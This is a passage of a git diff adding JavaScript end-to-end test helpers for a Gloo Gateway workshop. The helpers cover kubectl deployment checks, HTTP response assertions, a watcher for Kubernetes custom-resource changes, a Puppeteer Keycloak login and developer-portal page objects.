${command}`); + let cli = chaiExec(command); + let json = jsYaml.load(yaml) + + debugLog(`Command output (stdout): ${cli.stdout}`); + debugLog(`Command error (stderr): ${cli.stderr}`); + + cli.should.exit.with.code(0); + cli.stderr.should.be.empty; + let data = JSON.parse(cli.stdout); + debugLog(`Parsed data from CLI: ${JSON.stringify(data)}`); + + let diff = deepObjectDiff.detailedDiff(json, data); + debugLog(`Diff between expected and actual object: ${JSON.stringify(diff)}`); + + let expectedObject = false; + if (Object.keys(diff.updated).length === 0 && Object.keys(diff.deleted).length === 0) { + expectedObject = true; + } + debugLog(`Expected object found: ${expectedObject}`); + expect(expectedObject, "The following object can't be found or is not as expected:\n" + yaml).to.be.true; + }, + + checkDeployment: async ({ context, namespace, k8sObj }) => { + let command = "kubectl --context " + context + " -n " + namespace + " get deploy " + k8sObj + " -o jsonpath='{.status}'"; + debugLog(`Executing command: ${command}`); + let cli = chaiExec(command); + + debugLog(`Command output (stdout): ${cli.stdout}`); + debugLog(`Command error (stderr): ${cli.stderr}`); + + cli.stderr.should.be.empty; + let readyReplicas = JSON.parse(cli.stdout.slice(1, -1)).readyReplicas || 0; + let replicas = JSON.parse(cli.stdout.slice(1, -1)).replicas; + debugLog(`Ready replicas: ${readyReplicas}, Total replicas: ${replicas}`); + + if (readyReplicas != replicas) { + debugLog(`Deployment ${k8sObj} in ${context} not ready, retrying...`); + await utils.sleep(1000); + } + cli.should.exit.with.code(0); + readyReplicas.should.equal(replicas); + }, + + checkDeploymentHasPod: async ({ context, namespace, deployment }) => { + let command = "kubectl --context " + context + " -n " + namespace + " get deploy " + deployment + " -o name'"; + debugLog(`Executing command: ${command}`); + let cli = chaiExec(command); + + debugLog(`Command output (stdout): ${cli.stdout}`); + debugLog(`Command error (stderr): ${cli.stderr}`); + + cli.stderr.should.be.empty; + cli.stdout.should.not.be.empty; + cli.stdout.should.contain(deployment); + }, + + checkDeploymentsWithLabels: async ({ context, namespace, labels, instances }) => { + let command = "kubectl --context " + context + " -n " + namespace + " get deploy -l " + labels + " -o jsonpath='{.items}'"; + debugLog(`Executing command: ${command}`); + let cli = chaiExec(command); + + debugLog(`Command output (stdout): ${cli.stdout}`); + debugLog(`Command error (stderr): ${cli.stderr}`); + + cli.stderr.should.be.empty; + let deployments = JSON.parse(cli.stdout.slice(1, -1)); + debugLog(`Found deployments: ${JSON.stringify(deployments)}`); + + expect(deployments).to.have.lengthOf(instances); + deployments.forEach((deployment) => { + let readyReplicas = deployment.status.readyReplicas || 0; + let replicas = deployment.status.replicas; + debugLog(`Deployment ${deployment.metadata.name} - Ready replicas: ${readyReplicas}, Total replicas: ${replicas}`); + + if (readyReplicas != replicas) { + debugLog(`Deployment ${deployment.metadata.name} in ${context} not ready, retrying...`); + utils.sleep(1000); + } + cli.should.exit.with.code(0); + readyReplicas.should.equal(replicas); + }); + }, + + checkStatefulSet: async ({ context, namespace, k8sObj }) => { + let command = "kubectl --context " + context + " -n " + namespace + " get sts " + k8sObj + " -o jsonpath='{.status}'"; + debugLog(`Executing command: ${command}`); + let cli = chaiExec(command); + + debugLog(`Command output (stdout): ${cli.stdout}`); + debugLog(`Command error (stderr): ${cli.stderr}`); + + cli.stderr.should.be.empty; + let readyReplicas = JSON.parse(cli.stdout.slice(1, -1)).readyReplicas || 0; + let replicas = JSON.parse(cli.stdout.slice(1, -1)).replicas; + debugLog(`StatefulSet ${k8sObj} - Ready replicas: ${readyReplicas}, Total replicas: ${replicas}`); + + if (readyReplicas != replicas) { + debugLog(`StatefulSet ${k8sObj} in ${context} not ready, retrying...`); + await utils.sleep(1000); + } + cli.should.exit.with.code(0); + readyReplicas.should.equal(replicas); + }, + + checkDaemonSet: async ({ context, namespace, k8sObj }) => { + let command = "kubectl --context " + context + " -n " + namespace + " get ds " + k8sObj + " -o jsonpath='{.status}'"; + debugLog(`Executing command: ${command}`); + let cli = chaiExec(command); + + debugLog(`Command output (stdout): ${cli.stdout}`); + debugLog(`Command error (stderr): ${cli.stderr}`); + + cli.stderr.should.be.empty; + let readyReplicas = JSON.parse(cli.stdout.slice(1, -1)).numberReady || 0; + let replicas = JSON.parse(cli.stdout.slice(1, -1)).desiredNumberScheduled; + debugLog(`DaemonSet ${k8sObj} - Ready replicas: ${readyReplicas}, Total replicas: ${replicas}`); + + if (readyReplicas != replicas) { + debugLog(`DaemonSet ${k8sObj} in ${context} not ready, retrying...`); + await utils.sleep(1000); + } + cli.should.exit.with.code(0); + readyReplicas.should.equal(replicas); + }, + + k8sObjectIsPresent: ({ context, namespace, k8sType, k8sObj }) => { + let command = "kubectl --context " + context + " -n " + namespace + " get " + k8sType + " " + k8sObj + " -o name"; + debugLog(`Executing command: ${command}`); + let cli = chaiExec(command); + + debugLog(`Command output (stdout): ${cli.stdout}`); + debugLog(`Command error (stderr): ${cli.stderr}`); + + cli.stderr.should.be.empty; + cli.should.exit.with.code(0); + }, + + genericCommand: async ({ command, responseContains = "" }) => { + debugLog(`Executing generic command: ${command}`); + let cli = chaiExec(command); + + if (cli.stderr && cli.stderr != "") { + debugLog(`Command ${command} not successful: ${cli.stderr}`); + await utils.sleep(1000); + } + + debugLog(`Command output (stdout): ${cli.stdout}`); + debugLog(`Command error (stderr): ${cli.stderr}`); + + cli.stderr.should.be.empty; + cli.should.exit.with.code(0); + if (responseContains != "") { + debugLog(`Checking if stdout contains: ${responseContains}`); + cli.stdout.should.contain(responseContains); + } + }, + + getOutputForCommand: ({ command }) => { + debugLog(`Executing command: ${command}`); + let cli = chaiExec(command); + debugLog(`Command output (stdout): ${cli.stdout}`); + return cli.stdout; + }, + + curlInPod: ({ curlCommand, podName, namespace }) => { + debugLog(`Executing curl command: ${curlCommand} on pod: ${podName} in namespace: ${namespace}`); + const cli = chaiExec(curlCommand); + debugLog(`Curl command output (stdout): ${cli.stdout}`); + return cli.stdout; + }, + curlInDeployment: async ({ curlCommand, deploymentName, namespace, context }) => { + debugLog(`Executing curl command: ${curlCommand} on deployment: ${deploymentName} in namespace: ${namespace} and context: ${context}`); + let getPodCommand = `kubectl --context ${context} -n ${namespace} get pods -l app=${deploymentName} -o jsonpath='{.items[0].metadata.name}'`; + let podName = chaiExec(getPodCommand).stdout.trim(); + debugLog(`Pod selected for curl command: ${podName}`); + let execCommand = `kubectl --context ${context} -n ${namespace} exec ${podName} -- ${curlCommand}`; + const cli = chaiExec(execCommand); + debugLog(`Curl command output (stdout): ${cli.stdout}`); + return cli.stdout; + }, +}; + +module.exports = global; + +afterEach(function (done) { + if (this.currentTest.currentRetry() > 0 && this.currentTest.currentRetry() % 5 === 0) { + debugLog(`Test "${this.currentTest.fullTitle()}" retry: ${this.currentTest.currentRetry()}`); + } + utils.waitOnFailedTest(done, this.currentTest.currentRetry()) +}); diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/chai-http.js b/gloo-gateway/1-18/enterprise-vm/default/tests/chai-http.js new file mode 100644 index 0000000000..67f43db003 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/chai-http.js @@ -0,0 +1,139 @@ +const chaiHttp = require("chai-http"); +const chai = require("chai"); +const expect = chai.expect; +chai.use(chaiHttp); +const utils = require('./utils'); +const fs = require("fs"); +const { debugLog } = require('./utils/logging'); + +process.env.NODE_TLS_REJECT_UNAUTHORIZED = '0'; +process.env.NODE_NO_WARNINGS = 1; +chai.config.truncateThreshold = 4000; // length threshold for actual and expected values in assertion errors + +global = { + checkURL: ({ host, path = "", headers = [], certFile = '', keyFile = '', retCode }) => { + debugLog(`Checking URL: ${host}${path} with expected return code: ${retCode}`); + + let cert = certFile ? fs.readFileSync(certFile) : ''; + let key = keyFile ? fs.readFileSync(keyFile) : ''; + let request = chai.request(host).head(path).redirects(0).cert(cert).key(key); + + debugLog(`Setting headers: ${JSON.stringify(headers)}`); + headers.forEach(header => request.set(header.key, header.value)); + + return request + .send() + .then(async function (res) { + debugLog(`Response status code: ${res.status}`); + expect(res).to.have.status(retCode); + }); + }, + + checkBody: ({ host, path = "", headers = [], body = '', certFile = '', keyFile = '', method = "get", data = "", match = true }) => { + debugLog(`Checking body at ${host}${path} with method: ${method} and match condition: ${match}`); + + let cert = certFile ? fs.readFileSync(certFile) : ''; + let key = keyFile ? fs.readFileSync(keyFile) : ''; + let request = chai.request(host); + + switch (method) { + case "get": + request = request.get(path).redirects(0).cert(cert).key(key); + break; + case "post": + request = request.post(path).redirects(0); + break; + case "put": + request = request.put(path).redirects(0); + break; + case "head": + request = request.head(path).redirects(0); + break; + default: + throw 'The requested method is not implemented.'; + } + + debugLog(`Setting headers: ${JSON.stringify(headers)}`); + headers.forEach(header => request.set(header.key, header.value)); + + debugLog(`Sending data: ${data}`); + return request + .send(data) + .then(async function (res) { + debugLog(`Response body: ${res.text}`); + if (match) { + expect(res.text).to.contain(body); + } else { + expect(res.text).not.to.contain(body); + } + }); + }, + + checkHeaders: ({ host, path = "", headers = [], certFile = '', keyFile = '', expectedHeaders = [] }) => { + debugLog(`Checking headers for URL: ${host}${path}`); + + let cert = certFile ? fs.readFileSync(certFile) : ''; + let key = keyFile ? fs.readFileSync(keyFile) : ''; + let request = chai.request(host).get(path).redirects(0).cert(cert).key(key); + + debugLog(`Setting headers: ${JSON.stringify(headers)}`); + headers.forEach(header => request.set(header.key, header.value)); + + return request + .send() + .then(async function (res) { + debugLog(`Response headers: ${JSON.stringify(res.header)}`); + expectedHeaders.forEach(header => { + debugLog(`Checking header ${header.key} with expected value: ${header.value}`); + if (header.value === '*') { + expect(res.header).to.have.property(header.key); + } else { + expect(res.header[header.key]).to.equal(header.value); + } + }); + }); + }, + + checkWithMethod: ({ host, path, headers = [], method = "get", certFile = '', keyFile = '', retCode }) => { + debugLog(`Checking URL: ${host}${path} with method: ${method} and expected return code: ${retCode}`); + + let cert = certFile ? fs.readFileSync(certFile) : ''; + let key = keyFile ? fs.readFileSync(keyFile) : ''; + let request = chai.request(host); + + switch (method) { + case 'get': + request = request.get(path); + break; + case 'post': + request = request.post(path); + break; + case 'put': + request = request.put(path); + break; + default: + throw 'The requested method is not implemented.'; + } + + request.cert(cert).key(key).redirects(0); + + debugLog(`Setting headers: ${JSON.stringify(headers)}`); + headers.forEach(header => request.set(header.key, header.value)); + + return request + .send() + .then(async function (res) { + debugLog(`Response status code: ${res.status}`); + expect(res).to.have.status(retCode); + }); + } +}; + +module.exports = global; + +afterEach(function (done) { + if (this.currentTest.currentRetry() > 0 && this.currentTest.currentRetry() % 5 === 0) { + console.log(`Test "${this.currentTest.fullTitle()}" retry: ${this.currentTest.currentRetry()}`); + } + utils.waitOnFailedTest(done, this.currentTest.currentRetry()); +}); diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/k8s-changes.js b/gloo-gateway/1-18/enterprise-vm/default/tests/k8s-changes.js new file mode 100644 index 0000000000..07b7202922 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/k8s-changes.js @@ -0,0 +1,248 @@ +// k8s-cr-watcher.js + +const k8s = require('@kubernetes/client-node'); +const yaml = require('js-yaml'); +const diff = require('deep-diff').diff; + +function delay(ms) { + return new Promise(resolve => setTimeout(resolve, ms)); +} + +function sanitizeObject(obj) { + const sanitized = JSON.parse(JSON.stringify(obj)); + if (sanitized.metadata) { + delete sanitized.metadata.managedFields; + delete sanitized.metadata.generation; + delete sanitized.metadata.resourceVersion; + delete sanitized.metadata.creationTimestamp; + } + return sanitized; +} + +function getValueAtPath(obj, pathArray) { + return pathArray.reduce((acc, key) => (acc && acc[key] !== undefined) ? acc[key] : undefined, obj); +} + +// Helper function to format differences into a human-readable string +function formatDifferences(differences, previousObj, currentObj) { + let output = ''; + const handledArrayPaths = new Set(); + + differences.forEach(d => { + const path = d.path.join('.'); + if (d.kind === 'A') { + const arrayPath = d.path.join('.'); + if (!handledArrayPaths.has(arrayPath)) { + const beforeArray = getValueAtPath(previousObj, d.path); + const afterArray = getValueAtPath(currentObj, d.path); + + output += `• ${arrayPath}:\n\nBefore:\n${yaml.dump(beforeArray).trim().split('\n').join('\n')}\nAfter:\n${yaml.dump(afterArray).trim().split('\n').join('\n')}\n`; + handledArrayPaths.add(arrayPath); + } + } else { + // Check if this change is part of an already handled array + const isPartOfHandledArray = Array.from(handledArrayPaths).some(arrayPath => path.startsWith(arrayPath)); + + if (!isPartOfHandledArray) { + switch (d.kind) { + case 'E': // Edit + output += `• ${path}: '${JSON.stringify(d.lhs)}' => '${JSON.stringify(d.rhs)}'\n`; + break; + case 'N': // New + output += `• ${path}: Added '${JSON.stringify(d.rhs)}'\n`; + break; + case 'D': // Deleted + output += `• ${path}: Removed '${JSON.stringify(d.lhs)}'\n`; + break; + default: + output += `• ${path}: Changed\n`; + } + } + } + }); + + return output; +} + +// Function to extract change information from an event +function extractChangeInfo(type, apiObj, previousObj, currentObj) { + const name = apiObj.metadata.name; + const namespace = apiObj.metadata.namespace; + const kind = apiObj.kind; + const apiVersion = apiObj.apiVersion; + + let changeInfo = `${type}: ${kind} "${name}"`; + if (namespace) { + changeInfo += ` in namespace "${namespace}"`; + } + changeInfo += ` (apiVersion: ${apiVersion})`; + + if (type === 'MODIFIED' && previousObj) { + const differences = diff(previousObj, apiObj); + if (differences && differences.length > 0) { + // Filter out non-essential diffs + const essentialDifferences = differences.filter(d => { + const path = d.path.join('.'); + return !path.startsWith('metadata.generation') && + !path.startsWith('metadata.resourceVersion') && + !path.startsWith('metadata.creationTimestamp'); + }); + + if (essentialDifferences.length > 0) { + changeInfo += '\n\nDifferences:\n' + formatDifferences(essentialDifferences, previousObj, apiObj); + } else { + changeInfo += '\n\nNo meaningful differences detected'; + } + } else { + changeInfo += '\n\nNo differences detected'; + } + } + + return changeInfo; +} + +async function watchCRs(contextName, delaySeconds, durationSeconds) { + let changeCount = 0; + let isWatchSetupComplete = false; + + console.log(`Waiting for ${delaySeconds} seconds before starting the test...`); + await delay(delaySeconds * 1000); + console.log('Delay complete. Starting the test.'); + + const kc = new k8s.KubeConfig(); + kc.loadFromDefault(); + + const contexts = kc.getContexts(); + const context = contexts.find(c => c.name === contextName); + + kc.setCurrentContext(contextName); + + const k8sApi = kc.makeApiClient(k8s.CustomObjectsApi); + const apisApi = kc.makeApiClient(k8s.ApisApi); + + async function getResources(group, version) { + try { + const { body } = await k8sApi.listClusterCustomObject(group, version, ''); + return body.resources || []; + } catch (error) { + console.error(`Error getting resources for ${group}/${version}: ${error}`); + return []; + } + } + + // Function to watch a specific CR + async function watchCR(group, version, plural, abortController) { + const watch = new k8s.Watch(kc); + let resourceVersion; + + try { + // Get the latest resourceVersion + const listResponse = await k8sApi.listClusterCustomObject(group, version, plural); + resourceVersion = listResponse.body.metadata.resourceVersion; + + // Cache of previous objects (sanitized) + const objectCache = {}; + + // Initialize the object cache + if (listResponse.body.items) { + listResponse.body.items.forEach(item => { + objectCache[item.metadata.uid] = sanitizeObject(item); + }); + } + + await watch.watch( + `/apis/${group}/${version}/${plural}`, + { + abortSignal: abortController.signal, + allowWatchBookmarks: true, + resourceVersion: resourceVersion + }, + (type, apiObj) => { + if (isWatchSetupComplete) { + const uid = apiObj.metadata.uid; + + // Sanitize the current object by removing non-essential metadata + const sanitizedObj = sanitizeObject(apiObj); + + let previousObj = objectCache[uid]; + + if (previousObj) { + // Clone previousObj to avoid mutation + previousObj = JSON.parse(JSON.stringify(previousObj)); + } + + if (type === 'ADDED' || type === 'MODIFIED' || type === 'DELETED') { + const changeInfo = extractChangeInfo(type, sanitizedObj, previousObj, sanitizedObj); + + // Only log meaningful changes + if (type === 'MODIFIED' && changeInfo.includes('No meaningful differences detected')) { + // Skip logging if there are no meaningful changes + return; + } + + console.log(changeInfo); + console.log('---'); + console.log(yaml.dump(sanitizedObj).trim()); // Display the full object in YAML + console.log('---'); + + if (type === 'DELETED') { + delete objectCache[uid]; + } else { + objectCache[uid] = sanitizedObj; + } + + changeCount++; + } + } + }, + (err) => { + if (err && err.message !== 'aborted') { + console.error(`Error watching ${group}/${version}/${plural}: ${err}`); + } + } + ); + } catch (error) { + if (error.message !== 'aborted') { + console.error(`Error setting up watch for ${group}/${version}/${plural}: ${error}`); + } + } + } + + console.log(`Using context: ${contextName}`); + console.log(`Watching for CR changes with apiVersion containing "istio", "gloo", "solo" or "gateway.networking.k8s.io" for ${durationSeconds} seconds...`); + + const abortController = new AbortController(); + const watchPromises = []; + + const { body: apiGroups } = await apisApi.getAPIVersions(); + + for (const group of apiGroups.groups) { + if (group.name.includes('istio') || group.name.includes('gloo') || group.name.includes('solo') || group.name.includes('gateway.networking.k8s.io')) { + const latestVersion = group.preferredVersion || group.versions[0]; + const resources = await getResources(group.name, latestVersion.version); + + for (const resource of resources) { + if (resource.kind && resource.name && !resource.name.includes('/')) { + watchPromises.push(watchCR(group.name, latestVersion.version, resource.name, abortController)); + } + } + } + } + + console.log("Watch setup complete. Listening for changes..."); + console.log('---'); + + isWatchSetupComplete = true; + + await new Promise(resolve => setTimeout(resolve, durationSeconds * 1000)); + + abortController.abort(); + console.log(`Watch completed after ${durationSeconds} seconds.`); + console.log(`Total changes detected: ${changeCount}`); + + await Promise.allSettled(watchPromises); + + return changeCount; +} + +module.exports = { watchCRs }; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/k8s-changes.test.js.liquid b/gloo-gateway/1-18/enterprise-vm/default/tests/k8s-changes.test.js.liquid new file mode 100644 index 0000000000..85ff59def2 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/k8s-changes.test.js.liquid @@ -0,0 +1,25 @@ +const assert = require('assert'); +const { watchCRs } = require('./tests/k8s-changes'); + +describe('Kubernetes CR Watcher', function() { + let contextName = process.env.{{ context | default: "CLUSTER1" }}; + let delaySeconds = {{ delay | default: 5 }}; + let durationSeconds = {{ duration | default: 10 }}; + let changeCount = 0; + + it(`No CR changed in context ${contextName} for ${durationSeconds} seconds`, async function() { + this.timeout((durationSeconds + delaySeconds + 10) * 1000); + + changeCount = await watchCRs(contextName, delaySeconds, durationSeconds); + + assert.strictEqual(changeCount, 0, `Test failed: ${changeCount} changes were detected`); + }); + + after(function(done) { + setTimeout(() => { + process.exit(changeCount); + }, 1000); + + done(); + }); +}); \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/keycloak-token.js b/gloo-gateway/1-18/enterprise-vm/default/tests/keycloak-token.js new file mode 100644 index 0000000000..3ac1a691db --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/keycloak-token.js @@ -0,0 +1,4 @@ +const keycloak = require('./keycloak'); +const { argv } = require('node:process'); + +keycloak.getKeyCloakCookie(argv[2], argv[3]); diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/keycloak.js b/gloo-gateway/1-18/enterprise-vm/default/tests/keycloak.js new file mode 100644 index 0000000000..3af51e31c1 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/keycloak.js @@ -0,0 +1,48 @@ +const puppeteer = require('puppeteer'); +//const utils = require('./utils'); + +global = { + getKeyCloakCookie: async (url, user) => { + const browser = await puppeteer.launch({ + headless: "new", + slowMo: 40, + ignoreHTTPSErrors: true, + args: ['--no-sandbox', '--disable-setuid-sandbox'], // needed for instruqt + }); + // Create a new browser context + const context = await browser.createBrowserContext(); + const page = await context.newPage(); + await page.goto(url); + await page.waitForNetworkIdle({ options: { timeout: 1000 } }); + //await utils.sleep(1000); + + // Enter credentials + await page.screenshot({path: 'screenshot.png'}); + await page.waitForSelector('#username', { options: { timeout: 1000 } }); + await page.waitForSelector('#password', { options: { timeout: 1000 } }); + await page.type('#username', user); + await page.type('#password', 'password'); + await page.click('#kc-login'); + await page.waitForNetworkIdle({ options: { timeout: 1000 } }); + //await utils.sleep(1000); + + // Retrieve session cookie + const cookies = await page.cookies(); + const sessionCookie = cookies.find(cookie => cookie.name === 'keycloak-session'); + let ret; + if (sessionCookie) { + ret = `${sessionCookie.name}=${sessionCookie.value}`; // Construct the cookie string + } else { + // console.error(await page.content()); // very verbose + await page.screenshot({path: 'screenshot.png'}); + console.error(` No session cookie found for ${user}`); + ret = "keycloak-session=dummy"; + } + await context.close(); + await browser.close(); + console.log(ret); + return ret; + } +}; + +module.exports = global; diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/pages/base.js b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/base.js new file mode 100644 index 0000000000..af140b84f5 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/base.js @@ -0,0 +1,28 @@ +const { debugLog } = require('../utils/logging'); + +class BasePage { + constructor(page) { + this.page = page; + } + + async navigateTo(url) { + debugLog(`Navigating to ${url}`); + await this.page.goto(url, { waitUntil: 'networkidle2' }); + debugLog('Navigation complete'); + } + + async findVisibleSelector(selectors) { + for (const selector of selectors) { + const element = await this.page.$(selector); + if (element) { + const visible = await this.page.evaluate(el => !!(el.offsetWidth || el.offsetHeight || el.getClientRects().length), element); + if (visible) { + return selector; + } + } + } + throw new Error('No visible selector found for the provided options.'); + } +} + +module.exports = BasePage; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/pages/constants.js b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/constants.js new file mode 100644 index 0000000000..17068fbf55 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/constants.js @@ -0,0 +1,13 @@ +const InsightType = { + BP: 'BP', + CFG: 'CFG', + HLT: 'HLT', + ING: 'ING', + RES: 'RES', + RTE: 'RTE', + SEC: 'SEC', +}; + +module.exports = { + InsightType, +}; diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/admin-apps-page.js b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/admin-apps-page.js new file mode 100644 index 0000000000..35e4ea7de5 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/admin-apps-page.js @@ -0,0 +1,36 @@ +const BasePage = require("../base"); + +class DeveloperPortalAdminAppsPage extends BasePage { + constructor(page) { + super(page); + // Metadata selectors + this.editMetadataButton = 'button ::-p-text("Edit Custom Metadata")'; + this.metadataKeyInput = '#meta-key-input'; + this.metadataValueInput = '#meta-value-input'; + this.addMetadataButton = 'button[type="submit"] ::-p-text("Add Metadata")'; + this.saveMetadataButton = 'button[type="button"] ::-p-text("Save")'; + } + + async addCustomMetadata(key, value) { + // Click the edit metadata button + await this.page.waitForSelector(this.editMetadataButton, { visible: true }); + await this.page.locator(this.editMetadataButton).click(); + + // Fill in key and value + await this.page.waitForSelector(this.metadataKeyInput, { visible: true }); + await this.page.type(this.metadataKeyInput, key); + + await this.page.waitForSelector(this.metadataValueInput, { visible: true }); + await this.page.type(this.metadataValueInput, value); + + // Click add metadata button + await this.page.waitForSelector(this.addMetadataButton, { visible: true }); + await this.page.locator(this.addMetadataButton).click(); + + // Click save button + await this.page.waitForSelector(this.saveMetadataButton, { visible: true }); + await this.page.click(this.saveMetadataButton); + } +} + +module.exports = DeveloperPortalAdminAppsPage; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/admin-subscriptions-page.js b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/admin-subscriptions-page.js new file mode 100644 index 0000000000..0b53432f99 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/admin-subscriptions-page.js @@ -0,0 +1,85 @@ +const BasePage = require("../base"); + +class DeveloperPortalAdminSubscriptionPage extends BasePage { + constructor(page) { + super(page); + + // Subscription management selectors + this.approveButton = 'button ::-p-text("Approve")'; + this.confirmApproveButton = 'button[type="submit"] ::-p-text("Approve Subscription")'; + + // Metadata selectors + this.editMetadataButton = 'button ::-p-text("Edit Custom Metadata")'; + this.metadataKeyInput = '#meta-key-input'; + this.metadataValueInput = '#meta-value-input'; + this.addMetadataButton = 'button[type="submit"] ::-p-text("Add Metadata")'; + this.saveMetadataButton = 'button[type="button"] ::-p-text("Save")'; + + // Rate limit selectors + this.editRateLimitButton = 'button ::-p-text("Edit Rate Limit")'; + this.requestsPerUnitInput = '#rpu-input'; + this.unitSelect = '#unit-input'; + this.saveRateLimitButton = 'button[type="submit"] ::-p-text("Save")'; + } + + async approveSubscription() { + // Click the initial approve button + await this.page.waitForSelector(this.approveButton, { visible: true }); + await this.page.locator(this.approveButton).click(); + + // Wait for and click the confirm approve button in the modal + await this.page.waitForSelector(this.confirmApproveButton, { visible: true }); + await this.page.locator(this.confirmApproveButton).click(); + + // Wait for approve button to become disabled + await this.page.waitForFunction(() => { + const button = document.querySelector('button[data-disabled="true"]'); + return button && button.innerText.includes("Approve"); + }, { timeout: 3000 }); + } + + async addCustomMetadata(key, value) { + // Click the edit metadata button + await this.page.waitForSelector(this.editMetadataButton, { visible: true }); + await this.page.locator(this.editMetadataButton).click(); + + // Fill in key and value + await this.page.waitForSelector(this.metadataKeyInput, { visible: true }); + await this.page.type(this.metadataKeyInput, key); + + await this.page.waitForSelector(this.metadataValueInput, { visible: true }); + await this.page.type(this.metadataValueInput, value); + + // Click add metadata button + await this.page.waitForSelector(this.addMetadataButton, { visible: true }); + await this.page.locator(this.addMetadataButton).click(); + + // Click save button + await this.page.waitForSelector(this.saveMetadataButton, { visible: true }); + await this.page.click(this.saveMetadataButton); + } + + async setRateLimit(requests, unit) { + // Click edit rate limit button + await this.page.waitForSelector(this.editRateLimitButton, { visible: true }); + await this.page.locator(this.editRateLimitButton).click(); + + // Set requests per unit + await this.page.waitForSelector(this.requestsPerUnitInput, { visible: true }); + await this.page.type(this.requestsPerUnitInput, requests.toString()); + + // Click unit select to open dropdown + await this.page.click(this.unitSelect); + + // Select the unit from dropdown + await this.page.keyboard.press('ArrowDown'); + await this.page.keyboard.press('ArrowDown'); + await this.page.keyboard.press('Enter'); + + // Click save button + await this.page.waitForSelector(this.saveRateLimitButton, { visible: true }); + await this.page.click(this.saveRateLimitButton); + } +} + +module.exports = DeveloperPortalAdminSubscriptionPage; \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/api-page.js b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/api-page.js new file mode 100644 index 0000000000..9322071376 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/api-page.js @@ -0,0 +1,25 @@ +const BasePage = require("../base"); + +class DeveloperPortalAPIPage extends BasePage { + constructor(page) { + super(page) + + // Selectors + this.apiBlocksSelector = 'a[href^="/apis/"]'; + } + + async getAPIProducts() { + const apiBlocks = await this.page.evaluate((selector) => { + const blocks = document.querySelectorAll(selector); + + return Array.from(blocks).map(block => { + const blockHTML = block.outerHTML; + return blockHTML; + }); + }, this.apiBlocksSelector); + + return apiBlocks; + } +} + +module.exports = DeveloperPortalAPIPage; diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/apps-page.js b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/apps-page.js new file mode 100644 index 0000000000..1cbfe085fa --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/pages/dev-portal/apps-page.js @@ -0,0 +1,190 @@ +const BasePage = require("../base"); + +class DeveloperPortalAppsPage extends BasePage { + constructor(page) { + super(page); + + // App creation selectors + this.createAppButton = 'button ::-p-text("CREATE NEW APP")'; + this.teamSelectInput = '#app-team-select'; + this.appNameInput = '#app-name-input'; + this.appDescriptionInput = '#app-description-input'; + this.createAppSubmitButton = 'button[type="submit"] ::-p-text("Create App")'; + + // App details and subscription selectors + this.detailsLink = 'a::-p-text("DETAILS")'; + this.addSubscriptionButton = 'div::-p-text("ADD SUBSCRIPTION")'; + this.apiProductSelect = '#api-product-select'; + this.createSubscriptionButton = 'button[type="submit"] ::-p-text("Create Subscription")'; + + // API Key selectors + this.addApiKeyButton = 'div::-p-text("ADD API KEY")'; + this.apiKeyNameInput = '#api-key-name-input'; + this.submitApiKeyButton = 'button[type="submit"] ::-p-text("ADD API Key")'; + this.copyApiKeyButton = 'button[aria-label="Copy this API Key"]'; + this.closeModalButton = 'button ::-p-text("Close")'; + + // OAuth client selectors + this.createOAuthClientButton = 'button ::-p-text("Create OAuth Client")'; + this.confirmOAuthClientButton = 'button[type="submit"] ::-p-text("Create OAuth Client")'; + this.copyOAuthClientButton = 'button[aria-label="Copy this Client Secret"]'; + } + + async clickCreateNewApp() { + await this.page.locator(this.createAppButton).click(); + } + + async selectTeam(teamName) { + await this.page.waitForSelector(this.teamSelectInput); + await this.page.click(this.teamSelectInput); + + const teamOption = `div[role="option"]::-p-text("${teamName}")`; + await this.page.waitForSelector(teamOption); + await this.page.click(teamOption); + } + + async fillAppDetails(name, description) { + await this.page.waitForSelector(this.appNameInput, { visible: true }); + await this.page.type(this.appNameInput, name); + + await this.page.waitForSelector(this.appDescriptionInput, { visible: true }); + await this.page.type(this.appDescriptionInput, description); + } + + async submitAppCreation() { + await this.page.locator(this.createAppSubmitButton).click(); + } + + async createNewApp(teamName, appName, appDescription) { + await this.clickCreateNewApp(); + await this.selectTeam(teamName); + await this.fillAppDetails(appName, appDescription); + await this.submitAppCreation(); + } + + async navigateToAppDetails() { + await this.page.locator(this.detailsLink).click(); + } + + async clickAddSubscription() { + await this.page.locator(this.addSubscriptionButton).click(); + } + + async selectApiProduct(productName) { + await this.page.waitForSelector(this.apiProductSelect); + await this.page.click(this.apiProductSelect); + + const productOption = `div[role="option"]::-p-text("${productName}")`; + await this.page.waitForSelector(productOption); + await this.page.click(productOption); + } + + async submitSubscriptionCreation() { + await this.page.locator(this.createSubscriptionButton).click(); + } + + async createSubscription(apiProductName) { + await this.clickAddSubscription(); + await this.selectApiProduct(apiProductName); + await 